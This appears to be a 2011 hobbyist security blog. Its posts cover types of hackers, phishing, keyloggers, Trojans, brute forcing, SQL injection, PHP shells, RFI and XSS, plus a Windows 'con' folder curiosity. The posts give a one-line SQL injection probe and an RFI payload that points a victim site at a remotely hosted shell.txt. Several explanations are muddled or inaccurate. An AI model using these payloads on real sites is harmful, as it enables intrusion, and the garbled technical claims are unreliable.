Friday, January 28, 2011

Types of Hackers

Who attacks on the security system of the computer are called the attackers or hackers, but one thing to remember that all the hackers are not bad or dangerous, some are used to protect hacking. It is true hacking is an illegal but to protect yourself is a legal.

Following are the some types of hackers:
1.    Hacker: is a person who tries to gain the unauthorized access of the network security using their skills and hacking resources.
2.    Cracker: mostly cracker break the security system and destroy the data rather than to gain the access. So crackers are more dangerous than hackers. Because they did not give any chance to recover and escape.
3.    Ethical hacker: these are professional persons to give the protection from the hacking. These are not dangerous man that are hired by government, organizations etc. government give good salaries to these persons. These are also called white hat hackers.
4.    Script kiddies: these attackers have not so much knowledge about the programming or networking, they just use the pre-written hacking programs/software to attack on the network security system.

Monday, January 24, 2011

Email Based Hacking


There are two types of hacking. E-mail based hacking is the one type which we will discuss now. The next based hacking is the second portion of the types of hacking, keep to remember that both types are very important, hackers can use any way of hacking of any type.

Email or user information:
Now-a -days mostly hackers want to hack the basic information of the user which can be easily available on the internet like emails, passwords, credit card information etc.
         i.            Phishing
       ii.            Key logging
      iii.            Trojans
     iv.            Brute Forcing

Phishing:
It is a basically attack which is used by hackers, what’s happened in this attack. Hackers make a same web page as yahoo or gmail with his own server name. When user opens that page he thinks it is a real website, he enters username and password then click on submit button, then WHOA! His information has stored on the server of hackers, most interesting example, it happened in INDIA when so many clients of the ICICI bank stolen information.
The best way to protect, use the firewall that block the unregistered website.

Key logging:
Key loggers programs are the special type of software which sometimes automatically install on victim computer. What happened with this software that every key pressed by the user record automatically and start to save on the computer of hackers.  FTP, messengers, email are the method by the hackers to install the key loggers on the computer. It is very dangerous programs so be protect from these attacks, these happened without the knowledge of the users. The best way to protect, use the firewall that block the exe file to open automatically without the user authorization.

Trojans:
Trojans are called the father of key loggers. Trojans are like a gift which shows on screen on computer. Some innocent users do not know the programming language of the computer, so they install that gifts like screensavers etc. from the front end Trojans shows that these are screensavers but in the internal working the overall structure is different. For example tiny is the Trojan software. The updating of firewall or antivirus is the best way to protect operating system.

Brute Forcing:
These are used by the crackers to break the password of the system. With the help of this software you have to put the just username and for a password you put a notepad file, where will be all the password guessing list of passwords, system start to match the password file and continue until password does not match. On the internet there are lot of information about the guessing password.
To protect your system from these attacks, password should be more strong and complex, try to use the alphabets, numeric, special characters in your password.

Wednesday, January 19, 2011

Web Based Hacking

 After discussing the email based, now we find out how and what types of tools are used by hackers to take the services of the web server, which are more secure than the others. Following are the some attacks and tolls which are mostly used.
        i.            SQL Injection
      ii.            Shells
    iii.            RFI
     iv.            XSS
Let us discuss these attacks in detail;

SQL Injection:
Now-a-days mostly web servers are connected with the SQL servers, so  when user enter the username and password, that information is matched on the actual server, if the username and password are correct then user can login otherwise not. So passwords are stored in the encrypted method, we are not here decrypting the password just we are trying to change the command instructions on the command.
If u really want to check your website is under protection or not, or is vulnerable to RFI attach.
If your site's URL is:
Code
Yoursite.com/index.php?id=545
just add a ' like this at the end
Code:
Yoursite.com/index.php?id=545’

Shells:
Dot PHP is the advance programming language which is used to create the more secure software and wed servers. Shell is also a malicious .php scripts it is used with Shell of the operating system. Once the hacker become successful after authentication, hacker can rename, edit, download/upload the file according to the situation and requirements. Deface is another name of the shells.

RFI:
RFI is used with shell in the programming language. It is used to spoil the operating system. If u want to upload your shell........ use the following commands and understand:
Code:
Yoursite.com/shell.txt
and you found a vulnerable site to RFI... then you can do as follow:
Code
Victimsite.com/index.php?page=yousite.com/shell.txt

XSS:
It is called the Cross site scripting, in actual it is a computer security vulnerability which has found in the web server applications. Web pages are written in the HTML Hypertext Markup Language. So everybody knows the html programming language because it is very simple and easy to understand. If a hacker find the code of any web page then they can change the code with the malicious script into the content. The types of XSS are the Non-persistent, persistent, traditional etc.

Sunday, January 16, 2011

Why 'con' folder is not created in windows ?

If you will try to find the answer of this question then you will definitely found different views of different people regarding this question.
But the main reason is that con name has already assigned to windows that why we can't create file or folder of name of 'con'. I m sure after reading this post you will try to do practically. it is cool and unbelievable.